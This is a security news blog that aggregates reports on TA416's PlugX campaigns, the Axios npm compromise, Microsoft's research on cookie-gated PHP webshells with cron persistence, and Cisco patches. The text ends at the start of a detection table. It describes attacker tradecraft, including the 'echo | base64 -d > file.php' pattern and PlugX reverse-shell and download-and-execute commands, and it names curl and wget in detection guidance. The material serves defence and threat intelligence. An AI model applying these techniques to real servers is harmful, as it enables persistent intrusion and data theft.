Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my companies views.
Disclaimer: some of the links on this site are affiliate links, if you click on them and make a purchase, I make a commission.
A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.
The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.
"This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries," Proofpoint researchers Mark Kelly and Georgi Mladenov said.
"Throughout this period, TA416 regularly altered its infection chain, including abusing Cloudflare Turnstile challenge pages, abusing OAuth redirects, and using C# project files, as well as frequently updating its custom PlugX payload."
TA416 has also been observed orchestrating multiple campaigns aimed at diplomatic and government entities in the Middle East following the outbreak of the U.S.-Israel-Iran conflict in late February 2026. The effort is likely an attempt to gather regional intelligence pertaining to the conflict, the enterprise security company added.
It's worth mentioning here that TA416 also shares historical technical overlaps with another cluster known as Mustang Panda (aka CerenaKeeper, Red Ishtar, and UNK_SteadySplit). The two activity groups are collectively tracked under the monikers Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon.
While TA416's attacks are characterized by the use of bespoke PlugX variants, the Mustang Panda cluster has repeatedly deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What's common to both of them is the use of DLL side-loading to launch the malware.
TA416's renewed focus on European entities is driven a mix of web bug and malware delivery campaigns, with the threat actors using freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor via malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances. The PlugX malware campaigns were previously documented by StrikeReady and Arctic Wolf in October 2025.
"A web bug (or tracking pixel) is a tiny invisible object embedded in an email that triggers an HTTP request to a remote server when opened, revealing the recipient's IP address, user agent, and time of access, allowing the threat actor to assess whether the email was opened by the intended target," Proofpoint said.
Attacks carried out by TA416 in December 2025 have been found to leverage third-party Microsoft Entra ID cloud applications to initiate redirects that lead to the download of malicious archives. Phishing emails used as part of this attack wave contain a link to Microsoft's legitimate OAuth authorization endpoint that, when clicked, redirects the user to the attacker-controlled domain and ultimately deploys PlugX.
The use of this technique has not escaped Microsoft's notice, which last month warned of phishing campaigns targeting government and public-sector organizations that employ OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers.
Further refinements to the attack chain were observed in February 2026, when TA416 began linking to archives hosted on Google Drive or a compromised SharePoint instance. The downloaded archives, in this case, include a legitimate Microsoft MSBuild executable and a malicious C# project file.
"When the MSBuild executable is run, it searches the current directory for a project file and automatically builds it," the researchers said. "In the observed TA416 activity, the CSPROJ file acts as a downloader, decoding three Base64-encoded URLs to fetch a DLL side-loading triad from a TA416-controlled domain, saving them to the user's temp directory, and executing a legitimate executable to load PlugX via the group's typical DLL side-loading chain."
The PlugX malware remains a consistent presence throughout TA416's intrusions, although the legitimate, signed executables abused for DLL side-loading have varied over time. The backdoor is also known to establish an encrypted communication channel with its command-and-control (C2) server, but not before performing anti-analysis checks to sidestep detection.
PlugX accepts five different commands -
0x00000002, to capture system information
0x00001005, to uninstall the malware
0x00001007, to adjust beaconing interval and timeout parameter
0x00003004, to download a new payload (EXE, DLL, or DAT) and execute it
0x00007002, to open a reverse command shell
"TA416's shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, is consistent with a renewed intelligence-collection focus against EU and NATO-affiliated diplomacy entities," Proofpoint said.
"In addition, TA416's expansion to Middle Eastern government targeting in March 2026 further highlights how the group’s tasking prioritization is likely influenced by geopolitical flashpoints and escalations. Throughout this period, the group has shown a willingness to iterate on infection chains, cycling through using fake Cloudflare Turnstile pages, OAuth redirect abuse, and MSBuild-based delivery, while continuing to update its customized PlugX backdoor."
The disclosure comes as Darktrace revealed that Chinese‑nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with an intent to establish long-term persistence within critical infrastructure networks.
Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved the exploitation of internet-facing infrastructure (e.g., CVE-2025-31324 and CVE-2025-0994) to obtain initial access.
"In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after," Darktrace said. "The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent."
from The Hacker News https://ift.tt/hbuOB1Z
via IFTTT
Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.
Axios is a widely-deployed HTTP client library for JavaScript that simplifies HTTP requests, specifically for REST endpoints. The malicious packages were only available for approximately three hours, but if downloaded Talos strongly encourages that all deployments should be rolled back to previous known safe versions (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.
Details of supply chain attack
The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload to Linux, MacOS, or Windows.
On MacOS, a binary, “com.apple.act.mond”, is downloaded and run using zsh. Windows is delivered a ps1 file, which copies the legitimate powershell executable to “%PROGRAM DATA%\wt.exe”, and executes the downloaded ps1 file with hidden and execution policy bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with typical associated capabilities allowing the actor to gather information and run additional payloads.
Impact
As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials along with remote management capabilities. Therefore, Talos strongly recommends organizations treat any credentials present on their systems with the malicious package as compromised and begin the process of rotating them as quickly as possible. Actors are likely to try to weaponize access as quickly as possible to maximize financial gain.
Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.
Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
"Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality," the tech giant said.
The approach offers added stealth as it allows malicious code to stay dormant during normal application execution and activate the web shell logic only when specific cookie values are present. This behavior, Microsoft noted, extends to web requests, scheduled tasks, and trusted background workers.
The malicious activity takes advantage of the fact that cookie values are available at runtime through the $_COOKIE superglobal variable, allowing attacker-supplied inputs to be consumed without additional parsing. What's more, the technique is unlikely to raise any red flags as cookies blend into normal web traffic and reduce visibility.
The cookie-controlled execution model comes in different implementations -
A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload.
A PHP script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload.
In at least one case, threat actors have been found to obtain initial access to a victim's hosted Linux environment through valid credentials or the exploitation of a known security vulnerability to set up a cron job that invokes a shell routine periodically to execute an obfuscated PHP loader.
This "self-healing" architecture allows the PHP loader to be repeatedly recreated by the scheduled task even if it was removed as part of cleanup and remediation efforts, thereby creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains inactive during normal traffic and springs into action upon receiving HTTP requests with specific cookie values.
"By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," Microsoft added. "By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs."
A common aspect that ties together all the aforementioned implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, while leaving a minimal interactive footprint.
To counter the threat, Microsoft recommends enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces; monitoring for unusual login activity; restricting the execution of shell interpreters; auditing cron jobs and scheduled tasks across web servers; checking for suspicious file creation in web directories; and limiting hosting control panels' shell capabilities.
"The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft," Microsoft said. "By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls."
"Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code."
from The Hacker News https://ift.tt/Xl4Z0iJ
via IFTTT
The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time
This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.
Catching the Payload in the Act
The attack itself followed a multi-stage, fast-moving, pattern that is designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPi credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.
Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.
Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.
This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.
The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Compromised npm
For JavaScript HTTP client Axios, a major supply chain attack compromised its systems after malicious versions of an npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to include a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.
Source: Socket
The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.
The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.
Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.
Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.
The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution
Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.
While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively-exploited Chrome flaws addressed in 2026 so far, bringing the total to four for this year alone. Previous issues included vulnerabilities in Chrome’s CSS component, Skia graphics library, and V8 JavaScript engine.
The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.
To protect against the flaw, Users can update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flow to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026 to prevent their networks from attack. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.
The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly-targeted social engineering campaign orchestrated by North Korean threat actors tracked as UNC1069.
Maintainer Jason Saayman said the attackers tailored their social engineering efforts "specifically to me" by first approaching him under the guise of the founder of a legitimate, well-known company.
"They had cloned the company's founders' likeness as well as the company itself," Saayman said in a post-mortem of the incident. "They then invited me to a real Slack workspace. This workspace was branded to the company's CI and named in a plausible manner. The Slack [workspace] was thought out very well; they had channels where they were sharing LinkedIn posts."
Subsequently, the threat actors are said to have scheduled a meeting with him on Microsoft Teams. Upon joining the fake call, he was presented with a fake error message that stated "something on my system was out of date." As soon as the update was triggered, the attack led to the deployment of a remote access trojan.
The access afforded by the Trojan enabled the attackers to steal the npm account credentials necessary to publish two trojanized versions of the Axios npm package (1.14.1 and 0.30.4) containing an implant named WAVESHAPER.V2.
"Everything was extremely well coordinated, looked legit, and was done in a professional manner," Saayman added.
The attack chain described by the project maintainer shares extensive overlaps with tradecraft associated with UNC1069 and BlueNoroff. Details of the campaign were extensively documented by Huntress and Kaspersky last year, with the latter tracking it under the moniker GhostCall.
"Historically, [...] these specific guys have gone after crypto founders, VCs, public people," security researcher Taylor Monahan said. "They social engineer them and take over their accounts and target the next round of people. This evolution to targeting [OSS maintainers] is a bit concerning in my opinion."
As preventive steps, Saayman has outlined several changes, including resetting all devices and credentials, setting up immutable releases, adopting OIDC flow for publishing, and updating GitHub Actions to adopt best practices.
The findings demonstrate how open-source project maintainers are increasingly becoming the target of sophisticated attacks, effectively allowing threat actors to target downstream users at scale by publishing poisoned versions of highly popular packages.
With Axios attracting nearly 100 million weekly downloads and being used heavily across the JavaScript ecosystem, the blast radius of such a supply chain attack can be massive as it propagates swiftly through direct and transitive dependencies.
"A package as widely used as Axios being compromised shows how difficult it is to reason about exposure in a modern JavaScript environment," Socket's Ahmad Nassri said. "It is a property of how dependency resolution in the ecosystem works today."
from The Hacker News https://ift.tt/7EmD4xy
via IFTTT
The next major breach hitting your clients probably won't come from inside their walls. It'll come through a vendor they trust, a SaaS tool their finance team signed up for, or a subcontractor nobody in IT knows about. That's the new attack surface, and most organizations are underprepared for it.
For decades, cybersecurity strategy revolved around a defined perimeter. Firewalls, endpoint controls, and identity management systems were deployed to protect assets within a known boundary.
That boundary has dissolved.
Today, client data lives in third-party SaaS applications, flows through vendor APIs, and is processed by subcontractors that internal IT teams may not even know about. Security no longer stops at owned infrastructure. It extends across an interconnected ecosystem of external providers, and the accountability that comes with it extends there, too.
The 2025 Verizon Data Breach Investigations Report found that third parties are involved in 30% of breaches. IBM's 2025 Cost of a Data Breach Report puts the average remediation cost of a third-party breach at $4.91 million. Third-party exposure has become a core feature of modern business operations, not an edge case.
For proactive service providers, this shift creates a substantial opportunity. Organizations facing mounting third-party threats are looking for strategic partners who can own, streamline, and continuously manage the entire third-party risk lifecycle. Service providers who step into that role can introduce new service offerings, deliver higher-value consulting, and establish themselves as central to their clients' security and compliance programs.
From Checkbox to Core Risk Function
The traditional approach to vendor risk relied on annual questionnaires, spreadsheets, and the occasional follow-up email. It was never adequate, and it's especially costly now.
Regulatory frameworks like CMMC, NIS2, and DORA have raised the bar significantly. Compliance now requires demonstrable, ongoing oversight of third-party controls, not a point-in-time snapshot from twelve months ago. Boards are asking harder questions about vendor exposure. Cyber insurers are scrutinizing supply chain hygiene before writing policies. And clients who've watched competitors absorb the fallout from a vendor's breach understand that "it wasn't our system" doesn't limit their liability.
The market is responding accordingly. Global TPRM spending is projected to grow from $8.3 billion in 2024 to $18.7 billion by 2030. Organizations are treating vendor oversight as a governance function, on par with incident response or identity management, because the cost of ignoring it has become too high.
For service providers, that budget allocation is a clear signal. Clients are actively looking for partners who can own and manage vendor oversight as a defined, ongoing service.
Scaling TPRM Is Where Most Providers Get Stuck
Most MSPs and MSSPs recognize the opportunity. The hesitation comes down to delivery, and specifically to whether TPRM can be executed profitably at scale.
Traditional vendor review relies on fragmented workflows and manual analysis. Custom assessments must be sent, tracked, and interpreted, and risk must be tiered against each client's specific obligations. This work often falls to senior consultants, making it expensive and hard to delegate.
Multiplying this effort across a client portfolio with different vendor ecosystems, compliance needs, and risk tolerances can be unsustainable. This is why many providers offer TPRM as a one-off project instead of a recurring managed service.
But that's also where the opportunity lies. Cynomi's Securing the Modern Perimeter guide outlines how structured, technology-enabled TPRM can shift from a bespoke consulting engagement into a repeatable, high-margin service line that strengthens client retention, drives upsell, and positions service providers as integral partners in their clients' security programs.
Turning TPRM Into a Revenue Engine
Third-party risk is a conversation starter that never runs out of material.
Every new vendor a client onboards creates a potential risk discussion. Regulatory updates are natural reasons to revisit vendor programs, and every breach in the news that traces back to a third party reinforces the stakes. TPRM, done well, keeps service providers embedded in client strategy rather than relegated to reactive support, and that positioning changes the nature of the relationship entirely.
Providers who build out structured TPRM capabilities find that it opens doors to:
Broader security advisory work
Higher retainer values
Stronger client relationships built on genuine business impact
Differentiation in a crowded managed services market
Credible third-party risk governance, signaling maturity to prospective clients
The Bottom Line
Third-party risk isn't going away. The vendor ecosystems your clients depend on will keep growing more complex, with more SaaS platforms, AI-powered tools, subcontractors, and regulatory scrutiny layered on top.Organizations that manage this exposure well will have a meaningful advantage in resilience and compliance.
Building a structured, scalable TPRM practice that delivers consistent oversight across your portfolio creates far more leverage than adding headcount or assembling bespoke programs from scratch for every client. The infrastructure you build once pays dividends across every account.
Cynomi's Securing the Modern Perimeter: The Rise of Third-Party Risk Management is a practical starting point. It covers the full scope of modern third-party risk, what a governance-grade TPRM program looks like, and how service providers can build and scale this capability without sacrificing margins.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
from The Hacker News https://ift.tt/GsOS26u
via IFTTT
Cisco has released updates to address a critical security flaw in the Integrated Management Controller (IMC) that, if successfully exploited, could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system with elevated privileges.
The vulnerability, tracked as CVE-2026-20093, carries a CVSS score of 9.8 out of a maximum of 10.0.
"This vulnerability is due to incorrect handling of password change requests," Cisco said in an advisory released Wednesday. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device."
"A successful exploit could allow the attacker to bypass authentication, alter the passwords of any user on the system, including an Admin user, and gain access to the system as that user."
Security researcher "jyh" has been credited with discovering and reporting the vulnerability. The shortcoming affects the following products regardless of the device configuration -
5000 Series Enterprise Network Compute Systems (ENCS) - Fixed in 4.15.5
Catalyst 8300 Series Edge uCPE - Fixed in 4.18.3
UCS C-Series M5 and M6 Rack Servers in standalone mode - Fixed in 4.3(2.260007), 4.3(6.260017), and 6.0(1.250174)
UCS E-Series Servers M3 - Fixed in 3.2.17
UCS E-Series Servers M6 - Fixed in 4.15.3
Another critical vulnerability patched by Cisco impacts Smart Software Manager On-Prem (SSM On-Prem), which could enable an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. The vulnerability, CVE-2026-20160 (CVSS score: 9.8), stems from an unintentional exposure of an internal service.
"An attacker could exploit this vulnerability by sending a crafted request to the API of the exposed service," Cisco said. "A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges."
Patches for the flaw have been released in Cisco SSM On-Prem version 9-202601. Cisco said the vulnerability was discovered internally during the resolution of a Cisco Technical Assistance Center (TAC) support case.
While neither of the vulnerabilities has been exploited in the wild, a number ofrecentlydisclosed security flaws in Cisco products have been weaponized by threat actors. In the absence of a workaround, customers are recommended to update to the fixed version for optimal protection.
from The Hacker News https://ift.tt/lUNnD7Z
via IFTTT
Threat actors are increasingly abusing HTTP cookies as a control channel for PHP-based webshells on Linux servers. Instead of exposing command execution through URL parameters or request bodies, these webshells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality.
This approach reduces visibility by allowing malicious code to remain dormant during normal application behavior and execute only when specific cookie conditions are met. This technique has been observed across multiple execution contexts, including web requests, scheduled tasks, and trusted background workers.
The consistent use of cookies as a control mechanism suggests reuse of established webshell tradecraft. By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls.
Cookie-controlled execution behavior
Across the activity analyzed, HTTP cookies acted as the primary trigger for malicious execution. Instead of exposing functionality through visible URL parameters or request bodies, the webshell logic remained dormant unless specific cookie values were present. Only when those conditions were satisfied did the script reconstruct and execute threat actor–controlled behavior.
Threat actors likely prefer this approach because cookies blend into normal web traffic and often receive less scrutiny than request paths or payloads. In PHP, cookie values are immediately available at runtime, for example through the $_COOKIE superglobal, allowing malicious code to consume attacker-supplied input without additional parsing. By shifting execution control into cookies, the webshell can remain hidden in normal traffic, activating only during deliberate interactions. This reduces routine logging and inspection visibility while enabling persistent access without frequent changes to files on disk.
Observed variants of cookie-controlled PHP web shells
Although the core technique remained consistent across incidents, the PHP implementations varied in structure and complexity. The following examples illustrate how attackers adapted the same cookie-controlled execution model across different environments.
Loader with execution gating and layered obfuscation
One observed implementation introduced an additional execution gate before processing any cookie input. The loader first evaluated request context and reconstructed core PHP functions dynamically using arithmetic operations and string manipulation. Sensitive function names were intentionally absent in cleartext, significantly reducing obvious indicators and complicating pattern-based detection.
After the initial base64 decoding, the PHP script did not immediately reveal obvious command functionality. Instead, it exposed a second, deliberate layer of obfuscation. Critical operations were rebuilt programmatically at runtime, with function names and execution logic assembled character-by-character. This design ensured that meaningful behavior remained concealed until execution conditions were satisfied.
Only after these runtime checks passed did the script begin parsing structured cookie input. Cookie values were segmented and transformed into function identifiers, file paths, and decoding routines. If a secondary payload was not already present, the loader reconstructed it from encoded data, wrote it to a dynamically determined location, and transferred execution using ‘include’.
This layered approach separated deployment, obfuscation, and activation into distinct stages. Under routine traffic, the file appeared inert. When supplied with deliberate attacker-controlled input, however, it transitioned into a fully functional execution framework.
Direct cookie-driven payload stager
Another observed implementation relied on structured cookie data without extensive preliminary gating. The script segmented cookie input to reconstruct operational components such as file handling and decoding functions. As with the previous loader, it conditionally wrote a secondary payload to disk and executed it if absent.
Although simpler in structure, this variant achieved the same objective: staged deployment and execution controlled by cookie values rather than visible request parameters.
Cookie-gated interactive webshell
A streamlined variant was also observed in which a single cookie value acts as an execution key. When the expected cookie condition is met, the script enables threat actor–controlled actions, including direct execution of supplied input and, in some cases, file upload. Unlike staged loader chains, this implementation operates within a single script and does not rely on a separate secondary payload written to disk.
In this design, cookies primarily serve as a validation mechanism rather than a payload container.
Observed attack flow: Persistence through scheduled tasks
During incident investigation, we analyzed a compromise in which the threat actor prioritized durable, low-noise persistence within a hosted Linux environment. After obtaining access to the victim’s hosting account, the threat actor used the platform’s legitimate management interface, such as a control panel workflow, to register a cron job. In environments that provide restricted shell access, for example via /usr/local/cpanel/bin/jailshell, authenticated users can execute commands within their account boundary, including registering or launching scheduled tasks. Because these actions follow normal administrative paths, they appear as routine account-level operations rather than overt system modifications.
In shared hosting scenarios, this level of access is typically equivalent to user-level control within the account’s isolated environment. While it does not indicate root-level compromise or control of the underlying server, it provides sufficient capability to modify web content, deploy PHP scripts, and schedule recurring execution through cron. These permissions are often enough to convert temporary access into persistent remote code execution within the hosted account.
As illustrated in the diagram, the cron job executed at regular intervals and invoked a shell routine that reconstructed an obfuscated PHP loader into a web-accessible location. This behavior was intentionally implemented to maintain persistence. If the loader was removed, the scheduled task recreated it on the next execution cycle. The job also applied restrictive file permissions, making manual modification or removal more difficult during incident response.
This “self-healing” mechanism, controlled by the threat actor, allowed the malicious file to reappear after cleanup attempts, complicating remediation and enabling a more stable foothold within the affected hosting account.
Once deployed, the PHP loader followed the same low-visibility pattern described earlier. It remained inactive during normal traffic and activated only when specific cookie conditions were met. On activation, it dynamically rebuilt functionality at runtime and transferred execution to threat actor–controlled logic. By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs.
Commonalities and delivery methods
Across the activity analyzed, a consistent operational pattern emerged. While individual implementations varied in structure, each relied on multi-layer obfuscation to conceal sensitive functionality and cookie-gated execution to control activation. Under routine traffic conditions, the scripts remained dormant. Only when specific cookie values were supplied did the malicious logic reconstruct and execute. Whether deployed as a staged loader or an interactive webshell, the objective remained consistent: controlled activation with minimal observable footprint.
The delivery mechanism followed a similarly deliberate design. In multiple environments, web-facing processes such as php-fpm spawned shell commands that reconstructed obfuscated PHP files using the recognizable echo | base64 -d > file.php pattern. In other cases, equivalent commands were executed within restricted shell environments, such as through cPanel jailshell, or established via scheduled tasks at the hosting account level.
Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code. The repeated use of base64 reconstruction combined with multi-layer runtime obfuscation separated deployment, concealment, and activation into distinct phases. This layered design allowed the malicious code to blend into normal operational activity while maintaining reliable remote code execution.
In the attacks analyzed, persistence was deliberate, not incidental. Rather than depending on a single exploit or a short-lived foothold, the threat actor turned initial access into a repeatable mechanism for remote code execution (RCE). By combining scheduled tasks with obfuscated PHP loaders, they preserved the ability to execute code even after the original entry point was remediated or access paths were disrupted.
Persistent RCE provides long-term flexibility. It allows threat actors to return on demand to run additional commands, deploy follow-on payloads, alter application behavior, or pivot to other resources without repeatedly re-triggering the same exploit chain. This reduces operational risk and can limit the number of noisy intrusion attempts that might otherwise raise alerts.
In shared hosting environments, account-level access is often sufficient to create scheduled tasks, modify web content, and run arbitrary PHP within the affected site’s boundaries. When execution is further protected behind cookie-gated activation, the malicious logic can remain dormant during routine activity and activate only when the threat actor supplies the correct input. Over time, this durable access can support data theft, expansion to adjacent applications, or compromise of connected services, often with minimal visible disruption.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of PHP webshell–based compromises discussed in this report. These recommendations build on established guidance from previous Microsoft Defender research and align with protections available across Microsoft Defender XDR to help organizations prevent, detect, and respond to post-compromise web shell activity targeting web servers and application workloads.
Strengthen Hosting Account Security
Enforce multi-factor authentication for hosting control panels, SSH access, and administrative interfaces. Monitor for unusual login activity, particularly from unfamiliar IP addresses or geographies, as compromised account credentials are often sufficient to deploy webshells and create persistence mechanisms.
Restrict Web Server Process Execution
Limit the ability of web‑facing services such as php‑fpm or application worker workloads to spawn shell processes. Restrict the execution of shell interpreters (sh, bash, dash) and commonly abused encoding or file ingress utilities such as base64, curl, and wget from web server execution contexts unless they are explicitly required by the application.
Advanced Hunting can be used to surface cases where web server workloads spawn shell interpreters or execute encoded or file‑retrieval commands, as these patterns provide high‑signal indicators of webshell execution and command injection attempts.
Audit and Monitor Scheduled Tasks
Regularly review account‑level cron jobs and scheduled tasks across web servers and application hosts. Unexpected entries that invoke shell commands or write files into web‑accessible directories may indicate persistence mechanisms used to deploy, restore, or re‑activate malicious webshell loaders.
Advanced Hunting can be used to identify cron‑initiated execution patterns, including unusually short execution intervals (for example, recurring one‑minute jobs) and command lines associated with file creation, script execution, encoding utilities, or file ingress tools. These behaviours are commonly observed during web shell persistence and recovery activity following initial compromise
Inspect Suspicious File Creation in Web Directories
Focus on suspicious content deployment into web directories by monitoring the command‑line techniques used to write or retrieve files, rather than relying on file creation telemetry alone. Attackers frequently deploy PHP web shells by decoding obfuscated payloads inline (for example, using echo piped to base64 -d with output redirection) or by downloading scripts via file ingress tools such as curl or wget from web server or application execution contexts.
Advanced Hunting can be used to identify these behaviors by querying process execution events for decoding pipelines, redirection operators, or network retrieval utilities associated with web-facing workloads, providing high‑signal visibility into webshell deployment activity.
Limit Control Panel Shell Capabilities
Where hosting control panels are used, restrict or disable shell access such as jailshell wherever possible. If shell access is required, enforce strict access controls and closely monitor command execution to reduce the risk of attackers abusing these environments to deploy or interact with malicious PHP loaders and webshells.
Advanced hunting queries that track command execution from control panel restricted shells can help identify abuse patterns in which attackers leverage legitimate hosting features to maintain access or execute post-compromise tooling.
Microsoft recommends the following mitigations to reduce the impact of this threat in Linux environments protected by Microsoft Defender for Endpoint:
Enable cloud-delivered protection in Microsoft Defender for Endpoint on Linux or the equivalent capability in your antivirus solution. Cloud-based protection helps rapidly detect and block emerging attacker tools, including newly deployed PHP webshells and post-compromise scripts that may evade traditional signature-based detection.
Ensure real-time protection is enabled on Linux servers to continuously scan files written to disk, including web directories commonly targeted during PHP web shell deployment (such as /var/www, application upload paths, and temporary directories).
Enable behaviour monitoring to detect suspicious runtime activity associated with webshell abuse, such as anomalous child processes spawned by web server processes, execution of system utilities from PHP interpreters, credential access attempts, or data staging and exfiltration behaviours.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence. Security teams can leverage Copilot to assist with the analysis and interpretation of obfuscated or heavily encoded scripts, helping accelerate triage and improve understanding of attacker tradecraft during web shell and post-compromise investigations.
Tactic
Observed activity
Microsoft Defender coverage
